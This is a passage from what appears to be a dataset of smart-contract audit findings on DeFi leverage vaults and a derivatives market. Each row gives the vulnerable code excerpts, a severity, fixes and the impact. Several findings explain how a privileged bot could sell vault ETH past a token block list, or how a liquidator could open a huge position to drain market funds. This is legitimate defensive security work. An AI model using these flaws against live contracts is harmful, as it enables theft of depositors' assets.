sellToken is a valid reward token (i.e. none of the tokens\\n // used in the regular functioning of the vault).\\n rewardToken = trades[0].sellToken;\\n if (_isInvalidRewardToken(rewardToken)) revert Errors.InvalidRewardToken(rewardToken);\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n (amounts, amountSold) = StrategyUtils.executeRewardTrades(\\n tokens, trades, rewardToken, address(POOL_TOKEN())\\n );\\n }\\n```\\n\\nThe reason is that within the `_isInvalidRewardToken` function it checks if the reward token to be sold is any of the pool tokens. 
In this case, the condition will be evaluated to be true, and a revert will occur. As a result, the protocol would not be able to reinvest such reward tokens.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n","Consider tracking the number of pool tokens received during an emergency exit, and segregate these tokens with the reward tokens. For instance, the vault has 3000 CVX, 1000 of them are received during the emergency exit, while the rest are reward tokens emitted from Convex/Aura. In this case, the protocol can sell all CVX on the vault except for the 1000 CVX reserved.","The reinvestment of reward tokens is a critical component of the vault. The value per vault share increases when reward tokens are sold for the pool tokens and reinvested back into the Curve/Balancer pool to obtain more LP tokens. 
If this feature does not work as intended, it will lead to a loss of assets for the vault shareholders.","```\\nFile: SingleSidedLPVaultBase.sol\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n```\\n" +Native ETH not received when removing liquidity from Curve V2 pools,high,"Native ETH was not received when removing liquidity from Curve V2 pools due to the mishandling of Native ETH and WETH, leading to a loss of assets.\\nCurve V2 pool will always wrap to WETH and send to leverage vault unless the `use_eth` is explicitly set to `True`. Otherwise, it will default to `False`. The following implementation of the `remove_liquidity_one_coin` function taken from one of the Curve V2 pools shows that unless the `use_eth` is set to `True`, the `WETH.deposit()` will be triggered to wrap the ETH, and WETH will be transferred back to the caller. 
The same is true for the `remove_liquidity` function, but it is omitted for brevity.\\n```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256,\\n use_eth: bool = False, receiver: address = msg.sender) -> uint256:\\n A_gamma: uint256[2] = self._A_gamma()\\n\\n dy: uint256 = 0\\n D: uint256 = 0\\n p: uint256 = 0\\n xp: uint256[N_COINS] = empty(uint256[N_COINS])\\n future_A_gamma_time: uint256 = self.future_A_gamma_time\\n dy, p, D, xp = self._calc_withdraw_one_coin(A_gamma, token_amount, i, (future_A_gamma_time > 0), True)\\n assert dy >= min_amount, ""Slippage""\\n\\n if block.timestamp >= future_A_gamma_time:\\n self.future_A_gamma_time = 1\\n\\n self.balances[i] -= dy\\n CurveToken(self.token).burnFrom(msg.sender, token_amount)\\n\\n coin: address = self.coins[i]\\n if use_eth and coin == WETH20:\\n raw_call(receiver, b"""", value=dy)\\n else:\\n if coin == WETH20:\\n WETH(WETH20).deposit(value=dy)\\n response: Bytes[32] = raw_call(\\n coin,\\n _abi_encode(receiver, dy, method_id=method_id(""transfer(address,uint256)"")),\\n max_outsize=32,\\n )\\n if len(response) != 0:\\n assert convert(response, bool)\\n```\\n\\nNotional's Leverage Vault only works with Native ETH. It was found that the `remove_liquidity_one_coin` and `remove_liquidity` functions are executed without explicitly setting the `use_eth` parameter to `True`. Thus, WETH instead of Native ETH will be returned during remove liquidity. 
As a result, these WETH will not be accounted for in the vault and result in a loss of assets.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _unstakeAndExitPool(\\n..SNIP..\\n ICurve2TokenPool pool = ICurve2TokenPool(CURVE_POOL);\\n exitBalances = new uint256[](2);\\n if (isSingleSided) {\\n // Redeem single-sided\\n exitBalances[_PRIMARY_INDEX] = pool.remove_liquidity_one_coin(\\n poolClaim, int8(_PRIMARY_INDEX), _minAmounts[_PRIMARY_INDEX]\\n );\\n } else {\\n // Redeem proportionally, min amounts are rewritten to a fixed length array\\n uint256[2] memory minAmounts;\\n minAmounts[0] = _minAmounts[0];\\n minAmounts[1] = _minAmounts[1];\\n\\n uint256[2] memory _exitBalances = pool.remove_liquidity(poolClaim, minAmounts);\\n exitBalances[0] = _exitBalances[0];\\n exitBalances[1] = _exitBalances[1];\\n }\\n```\\n","If one of the pool tokens is ETH, consider setting `is_eth` to true when calling `remove_liquidity_one_coin` and `remove_liquidity` functions to ensure that Native ETH is sent back to the vault.","Following are some of the impacts due to the mishandling of Native ETH and WETH during liquidity removal in Curve pools, leading to loss of assets:\\nWithin the `redeemFromNotional`, if the vaults consist of ETH, the `_UNDERLYING_IS_ETH` will be set to true. In this case, the code will attempt to call `transfer` to `transfer` Native ETH, which will fail as Native ETH is not received and users/Notional are unable to redeem.\\n`File: BaseStrategyVault.sol\\n175: function redeemFromNotional(\\n..SNIP..\\n199: if (_UNDERLYING_IS_ETH) {\\n200: if (transferToReceiver > 0) payable(receiver).transfer(transferToReceiver);\\n201: if (transferToNotional > 0) payable(address(NOTIONAL)).transfer(transferToNotional);\\n202: } else {\\n..SNIP..`\\nWETH will be received instead of Native ETH during the emergency exit. During vault restoration, WETH is not re-entered into the pool as only Native ETH residing in the vault will be transferred to the pool. 
Leverage vault only works with Native ETH, and if one of the pool tokens is WETH, it will be converted to Native ETH (0x0 or 0xEeeee) during deployment/initialization. Thus, the WETH is stuck in the vault. This causes the value per share to drop significantly. (Reference)\\n`File: SingleSidedLPVaultBase.sol\\n480: function emergencyExit(\\n481: uint256 claimToExit, bytes calldata /* data */\\n482: ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n483: StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n484: if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n485: \\n486: // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n487: // in a proportional exit. Front running will not have an effect since no trading will\\n488: // occur during a proportional exit.\\n489: _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n490: \\n491: state.totalPoolClaim = state.totalPoolClaim - claimToExit;\\n492: state.setStrategyVaultState();`","```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256,\\n use_eth: bool = False, receiver: address = msg.sender) -> uint256:\\n A_gamma: uint256[2] = self._A_gamma()\\n\\n dy: uint256 = 0\\n D: uint256 = 0\\n p: uint256 = 0\\n xp: uint256[N_COINS] = empty(uint256[N_COINS])\\n future_A_gamma_time: uint256 = self.future_A_gamma_time\\n dy, p, D, xp = self._calc_withdraw_one_coin(A_gamma, token_amount, i, (future_A_gamma_time > 0), True)\\n assert dy >= min_amount, ""Slippage""\\n\\n if block.timestamp >= future_A_gamma_time:\\n self.future_A_gamma_time = 1\\n\\n self.balances[i] -= dy\\n CurveToken(self.token).burnFrom(msg.sender, token_amount)\\n\\n coin: address = self.coins[i]\\n if use_eth and coin == WETH20:\\n raw_call(receiver, b"""", value=dy)\\n else:\\n if coin == WETH20:\\n WETH(WETH20).deposit(value=dy)\\n response: Bytes[32] = raw_call(\\n coin,\\n _abi_encode(receiver, dy, 
method_id=method_id(""transfer(address,uint256)"")),\\n max_outsize=32,\\n )\\n if len(response) != 0:\\n assert convert(response, bool)\\n```\\n" +Single-sided instead of proportional exit is performed during emergency exit,high,"Single-sided instead of proportional exit is performed during emergency exit, which could lead to a loss of assets during emergency exit and vault restoration.\\nPer the comment in Line 476 below, the BPT should be redeemed proportionally to underlying tokens during an emergency exit. However, it was found that the `_unstakeAndExitPool` function is executed with the `isSingleSided` parameter set to `true`.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Allows the emergency exit role to trigger an emergency exit on the vault.\\n /// In this situation, the `claimToExit` is withdrawn proportionally to the underlying\\n /// tokens and held on the vault. The vault is locked so that no entries, exits or\\n /// valuations of vaultShares can be performed.\\n /// @param claimToExit if this is set to zero, the entire pool claim is withdrawn\\n function emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n\\n // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n // in a proportional exit. Front running will not have an effect since no trading will\\n // occur during a proportional exit.\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n```\\n\\nIf the `isSingleSided` is set to `True`, the `EXACT_BPT_IN_FOR_ONE_TOKEN_OUT` will be used, which is incorrect. 
Per the Balancer's documentation, `EXACT_BPT_IN_FOR_ONE_TOKEN_OUT` is a single asset exit where the user sends a precise quantity of BPT, and receives an estimated but unknown (computed at run time) quantity of a single token.\\nTo perform a proportional exit, the `EXACT_BPT_IN_FOR_TOKENS_OUT` should be used instead.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _unstakeAndExitPool(\\n uint256 poolClaim, uint256[] memory minAmounts, bool isSingleSided\\n ) internal override returns (uint256[] memory exitBalances) {\\n bool success = AURA_REWARD_POOL.withdrawAndUnwrap(poolClaim, false); // claimRewards = false\\n require(success);\\n\\n bytes memory customData;\\n if (isSingleSided) {\\n..SNIP..\\n uint256 primaryIndex = PRIMARY_INDEX();\\n customData = abi.encode(\\n IBalancerVault.ComposableExitKind.EXACT_BPT_IN_FOR_ONE_TOKEN_OUT,\\n poolClaim,\\n primaryIndex < BPT_INDEX ? primaryIndex : primaryIndex - 1\\n );\\n```\\n\\nThe same issue affects the Curve's implementation of the `_unstakeAndExitPool` function.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _unstakeAndExitPool(\\n uint256 poolClaim, uint256[] memory _minAmounts, bool isSingleSided\\n ) internal override returns (uint256[] memory exitBalances) {\\n..SNIP..\\n ICurve2TokenPool pool = ICurve2TokenPool(CURVE_POOL);\\n exitBalances = new uint256[](2);\\n if (isSingleSided) {\\n // Redeem single-sided\\n exitBalances[_PRIMARY_INDEX] = pool.remove_liquidity_one_coin(\\n poolClaim, int8(_PRIMARY_INDEX), _minAmounts[_PRIMARY_INDEX]\\n );\\n```\\n","Set the `isSingleSided` parameter to `false` when calling the `_unstakeAndExitPool` function to ensure that the proportional exit is performed.\\n```\\nfunction emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n ..SNIP..\\n// Remove the line 
below\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n// Add the line below\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), false);\\n```\\n","The following are some of the impacts of this issue, which lead to loss of assets:\\nRedeeming LP tokens one-sided incurs unnecessary slippage as tokens have to be swapped internally to one specific token within the pool, resulting in fewer assets received.\\nPer the source code comment below, in other words, unless a proportional exit is performed, the emergency exit will be subjected to front-run attack and slippage.\\n`File: SingleSidedLPVaultBase.sol\\n486: // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n487: // in a proportional exit. Front running will not have an effect since no trading will\\n488: // occur during a proportional exit.\\n489: _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);`\\nAfter the emergency exit, the vault only held one of the pool tokens. To re-enter the pool, the vault has to either swap the token to other pool tokens on external DEXs to maintain the proportion or perform a single-sided join. Both of these methods will incur unnecessary slippage, resulting in fewer LP tokens received at the end.","```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Allows the emergency exit role to trigger an emergency exit on the vault.\\n /// In this situation, the `claimToExit` is withdrawn proportionally to the underlying\\n /// tokens and held on the vault. 
The vault is locked so that no entries, exits or\\n /// valuations of vaultShares can be performed.\\n /// @param claimToExit if this is set to zero, the entire pool claim is withdrawn\\n function emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n\\n // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n // in a proportional exit. Front running will not have an effect since no trading will\\n // occur during a proportional exit.\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n```\\n" +reinvestReward() generates dust totalPoolClaim causing vault abnormal,medium,"If the first user deposits too small an amount, due to rounding down, it may result in 0 shares, which will result in 0 shares no matter how much is deposited later. In `Notional`, this situation will be prevented by setting `a minimum borrow size and a minimum leverage ratio`. 
However, `reinvestReward()` does not have this restriction, which may cause this problem to still exist, causing the vault to enter an abnormal state.\\nThe calculation of the shares of the vault is as follows:\\n```\\n function _mintVaultShares(uint256 lpTokens) internal returns (uint256 vaultShares) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (state.totalPoolClaim == 0) {\\n // Vault Shares are in 8 decimal precision\\n vaultShares = (lpTokens * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / POOL_PRECISION();\\n } else {\\n vaultShares = (lpTokens * state.totalVaultSharesGlobal) / state.totalPoolClaim;\\n }\\n\\n // Updates internal storage here\\n state.totalPoolClaim += lpTokens;\\n state.totalVaultSharesGlobal += vaultShares.toUint80();\\n state.setStrategyVaultState();\\n```\\n\\nIf the first `deposit` is too small, due to the conversion to `INTERNAL_TOKEN_PRECISION`, the precision is lost, resulting in `vaultShares=0`. Subsequent depositors will enter the second calculation, but `totalVaultSharesGlobal=0`, so `vaultShares` will always be `0`.\\nTo avoid this situation, `Notional` has restrictions.\\nhey guys, just to clarify some rounding issues stuff on vault shares and the precision loss. Notional will enforce a minimum borrow size and a minimum leverage ratio on users which will essentially force their initial deposits to be in excess of any dust amount. so we should not really see any tiny deposits that result in rounding down to zero vault shares. If there was rounding down to zero, the account will likely fail their collateral check as the vault shares act as collateral and the would have none. there is the possibility of a dust amount entering into depositFromNotional in a valid state, that would be due to an account ""rolling"" a position from one debt maturity to another. 
in this case, a small excess amount of deposit may come into the vault but the account would still be forced to be holding a sizeable position overall due to the minimum borrow size.\\nin `reinvestReward()`, there is no such limit\\n```\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n\\n poolClaimAmount = _joinPoolAndStake(amounts, minPoolClaim);\\n\\n // Increase LP token amount without minting additional vault shares\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n state.totalPoolClaim += poolClaimAmount;\\n state.setStrategyVaultState();\\n\\n emit RewardReinvested(rewardToken, amountSold, poolClaimAmount);\\n }\\n```\\n\\nFrom the above code, we know that `reinvestReward()` will increase `totalPoolClaim`, but will not increase `totalVaultSharesGlobal`.\\nThis will cause problems in the following scenarios:\\nThe current vault has deposits.\\n`Rewards` have been generated, but `reinvestReward()` has not been executed.\\nThe `bot` submitted the `reinvestReward()` transaction. 
but step 4 executes first\\nThe users took away all the deposits `totalPoolClaim = 0`, `totalVaultSharesGlobal=0`.\\nAt this time `reinvestReward()` is executed, then `totalPoolClaim > 0`, `totalVaultSharesGlobal=0`.\\nOther users' deposits will fail later\\nIt is recommended that `reinvestReward()` add a check that `totalVaultSharesGlobal>0`.\\nNote: If there is a malicious REWARD_REINVESTMENT_ROLE, it can provoke this issue by donating reward tokens and triggering reinvestReward() before the first depositor appears.","```\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. 
This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n\\n poolClaimAmount = _joinPoolAndStake(amounts, minPoolClaim);\\n\\n // Increase LP token amount without minting additional vault shares\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n// Add the line below\\n require(state.totalVaultSharesGlobal > 0 ,""invalid shares"");\\n state.totalPoolClaim // Add the line below\\n= poolClaimAmount;\\n state.setStrategyVaultState();\\n\\n emit RewardReinvested(rewardToken, amountSold, poolClaimAmount);\\n }\\n```\\n",reinvestReward() generates dust totalPoolClaim causing vault abnormal,```\\n function _mintVaultShares(uint256 lpTokens) internal returns (uint256 vaultShares) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (state.totalPoolClaim == 0) {\\n // Vault Shares are in 8 decimal precision\\n vaultShares = (lpTokens * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / POOL_PRECISION();\\n } else {\\n vaultShares = (lpTokens * state.totalVaultSharesGlobal) / state.totalPoolClaim;\\n }\\n\\n // Updates internal storage here\\n state.totalPoolClaim += lpTokens;\\n state.totalVaultSharesGlobal += vaultShares.toUint80();\\n state.setStrategyVaultState();\\n```\\n +ETH can be sold during reinvestment,medium,"The existing control to prevent ETH from being sold during reinvestment can be bypassed, allowing the bots to accidentally or maliciously sell off the non-reward assets of the vault.\\nMultiple instances of this issue were found:\\nInstance 1 - Curve's Implementation\\nThe `_isInvalidRewardToken` function attempts to prevent the callers from selling away ETH during reinvestment.\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == 
TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n\\nHowever, the code at Line 67 above will not achieve the intended outcome as `Deployments.ALT_ETH_ADDRESS` is not a valid token address in the first place.\\n```\\naddress internal constant ALT_ETH_ADDRESS = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n```\\n\\nWhen the caller is executing a trade with ETH, the address for ETH used is either `Deployments.WETH` or `Deployments.ETH_ADDRESS` (address(0)) as shown in the TradingUtils's source code, not the `Deployments.ALT_ETH_ADDRESS`.\\n```\\nFile: TradingUtils.sol\\n function _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n ) private {\\n uint256 preTradeBalance;\\n \\n if (trade.buyToken == address(Deployments.WETH)) {\\n preTradeBalance = address(this).balance;\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS || _needsToUnwrapExcessWETH(trade, spender)) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n }\\n```\\n\\nAs a result, the caller (bot) of the reinvestment function could still sell off the ETH from the vault, bypassing the requirement.\\nInstance 2 - Balancer's Implementation\\nWhen the caller is executing a trade with ETH, the address for ETH used is either `Deployments.WETH` or `Deployments.ETH_ADDRESS` (address(0)), as mentioned earlier. 
However, the `AuraStakingMixin._isInvalidRewardToken` function only blocks `Deployments.WETH` but not `Deployments.ETH`, thus allowing the caller (bot) of the reinvestment function, could still sell off the ETH from the vault, bypassing the requirement.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\nPer the sponsor's clarification below, the contracts should protect against the bot doing unintended things (including acting maliciously) due to coding errors, which is one of the main reasons for having the `_isInvalidRewardToken` function. Thus, this issue is a valid bug in the context of this audit contest.\\n","To ensure that ETH cannot be sold off during reinvestment, consider the following changes:\\nCurve\\n```\\nFile: ConvexStakingMixin.sol\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n// Add the line below\\n token == Deployments.ETH ||\\n// Add the line below\\n token == Deployments.WETH ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n}\\n```\\n\\nBalancer\\n```\\nFile: AuraStakingMixin.sol\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n// Add the line below\\n token == address(Deployments.ETH) \\n token == address(Deployments.WETH)\\n );\\n}\\n```\\n","The 
existing control to prevent ETH from being sold during reinvestment can be bypassed, allowing the bots to accidentally or maliciously sell off the non-reward assets of the vault.",```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n +Leverage Vault on sidechains that support Curve V2 pools is broken,medium,"No users will be able to deposit to the Leverage Vault on Arbitrum and Optimism that supports Curve V2 pools, leading to the core contract functionality of a vault being broken and a loss of revenue for the protocol.\\nFollowing are examples of some Curve V2 pools in Arbitum:\\nThe code from Line 64 to Line 71 is only executed if the contract resides on Ethereum. As a result, for Arbitrum and Optimism sidechains, the `IS_CURVE_V2` variable is always false.\\n```\\nFile: Curve2TokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_,\\n DeploymentParams memory params\\n ) SingleSidedLPVaultBase(notional_, params.tradingModule) {\\n CURVE_POOL = params.pool;\\n\\n bool isCurveV2 = false;\\n if (Deployments.CHAIN_ID == Constants.CHAIN_ID_MAINNET) {\\n address[10] memory handlers = \\n Deployments.CURVE_META_REGISTRY.get_registry_handlers_from_pool(address(CURVE_POOL));\\n\\n require(\\n handlers[0] == Deployments.CURVE_V1_HANDLER ||\\n handlers[0] == Deployments.CURVE_V2_HANDLER\\n ); // @dev unknown Curve version\\n isCurveV2 = (handlers[0] == Deployments.CURVE_V2_HANDLER);\\n }\\n IS_CURVE_V2 = isCurveV2;\\n```\\n\\nAs a result, code within the `_joinPoolAndStake` function will always call the Curve V1's `add_liquidity` function that does not define the `use_eth` parameter.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function 
_joinPoolAndStake(\\n..SNIP..\\n // Slightly different method signatures in v1 and v2\\n if (IS_CURVE_V2) {\\n lpTokens = ICurve2TokenPoolV2(CURVE_POOL).add_liquidity{value: msgValue}(\\n amounts, minPoolClaim, 0 < msgValue // use_eth = true if msgValue > 0\\n );\\n } else {\\n lpTokens = ICurve2TokenPoolV1(CURVE_POOL).add_liquidity{value: msgValue}(\\n amounts, minPoolClaim\\n );\\n }\\n```\\n\\nIf the `use_eth` parameter is not defined, it will default to `False`. As a result, the Curve pool expects the caller to transfer over the WETH to the pool and the pool will call `WETH.withdraw` to unwrap the WETH to Native ETH as shown in the code below.\\nHowever, Notional's leverage vault only works with Native ETH, and if one of the pool tokens is WETH, it will explicitly convert the address to either the `Deployments.ALT_ETH_ADDRESS` (0xEeeee) or `Deployments.ETH_ADDRESS` (address(0)) during deployment and initialization.\\nThe implementation of the above `_joinPoolAndStake` function will forward Native ETH to the Curve Pool, while the pool expects the vault to transfer in WETH. As a result, a revert will occur since the pool did not receive the WETH it required during the unwrap process.\\n```\\ndef add_liquidity(\\n amounts: uint256[N_COINS],\\n min_mint_amount: uint256,\\n use_eth: bool = False,\\n receiver: address = msg.sender\\n) -> uint256:\\n """"""\\n @notice Adds liquidity into the pool.\\n @param amounts Amounts of each coin to add.\\n @param min_mint_amount Minimum amount of LP to mint.\\n @param use_eth True if native token is being added to the pool.\\n @param receiver Address to send the LP tokens to. 
Default is msg.sender\\n @return uint256 Amount of LP tokens received by the `receiver\\n """"""\\n..SNIP..\\n # --------------------- Get prices, balances -----------------------------\\n..SNIP..\\n # -------------------------------------- Update balances and calculate xp.\\n..SNIP// rest of code\\n # ---------------- transferFrom token into the pool ----------------------\\n\\n for i in range(N_COINS):\\n\\n if amounts[i] > 0:\\n\\n if coins[i] == WETH20:\\n\\n self._transfer_in(\\n coins[i],\\n amounts[i],\\n 0, # <-----------------------------------\\n msg.value, # | No callbacks\\n empty(address), # <----------------------| for\\n empty(bytes32), # <----------------------| add_liquidity.\\n msg.sender, # |\\n empty(address), # <-----------------------\\n use_eth\\n )\\n```\\n\\n```\\ndef _transfer_in(\\n..SNIP..\\n use_eth: bool\\n):\\n..SNIP..\\n @params use_eth True if the transfer is ETH, False otherwise.\\n """"""\\n\\n if use_eth and _coin == WETH20:\\n assert mvalue == dx # dev: incorrect eth amount\\n else:\\n..SNIP..\\n if _coin == WETH20:\\n WETH(WETH20).withdraw(dx) # <--------- if WETH was transferred in\\n # previous step and `not use_eth`, withdraw WETH to ETH.\\n```\\n","Ensure the `IS_CURVE_V2` variable is initialized on the Arbitrum and Optimism side chains according to the Curve Pool's version.\\nIf there is a limitation on the existing approach to determining a pool is V1 or V2 on Arbitrum and Optimsim, an alternative approach might be to use the presence of a `gamma()` function as an indicator of pool type","No users will be able to deposit to the Leverage Vault on Arbitrum and Optimism that supports Curve V2 pools. The deposit function is a core function of any vault. 
Thus, this issue breaks the core contract functionality of a vault.\\nIn addition, if the affected vaults cannot be used, it leads to a loss of revenue for the protocol.","```\\nFile: Curve2TokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_,\\n DeploymentParams memory params\\n ) SingleSidedLPVaultBase(notional_, params.tradingModule) {\\n CURVE_POOL = params.pool;\\n\\n bool isCurveV2 = false;\\n if (Deployments.CHAIN_ID == Constants.CHAIN_ID_MAINNET) {\\n address[10] memory handlers = \\n Deployments.CURVE_META_REGISTRY.get_registry_handlers_from_pool(address(CURVE_POOL));\\n\\n require(\\n handlers[0] == Deployments.CURVE_V1_HANDLER ||\\n handlers[0] == Deployments.CURVE_V2_HANDLER\\n ); // @dev unknown Curve version\\n isCurveV2 = (handlers[0] == Deployments.CURVE_V2_HANDLER);\\n }\\n IS_CURVE_V2 = isCurveV2;\\n```\\n" +"Liquidator can liquidate user while increasing user position to any value, stealing all Market funds or bricking the contract",high,"When a user is liquidated, there is a check to ensure that after liquidator order executes, `closable = 0`, but this actually doesn't prevent liquidator from increasing user position, and since all position size and collateral checks are skipped during liquidation, this allows malicious liquidator to open position of max possible size (2^62-1) during liquidation. Opening such huge position means the Market contract accounting is basically broken from this point without any ability to restore it. For example, the fee paid (and accumulated by makers) from opening such position will be higher than entire Market collateral balance, so any maker can withdraw full Market balance immediately after this position is settled.\\n`closable` is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. 
For example:\\nLatest position = 10\\nPending position [t=200] = 0\\nPending position [t=300] = 1000\\nIn such scenario `closable = 0` (regardless of position size at t=300).\\nWhen position is liquidated (called `protected` in the code), the following requirements are enforced in _invariant():\\n```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n\\nif (\\n !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) && // sender has no position\\n !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change\\n (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter) // price is not stale\\n) revert MarketStalePriceError();\\n\\nif (context.marketParameter.closed && newOrder.increasesPosition())\\n revert MarketClosedError();\\n\\nif 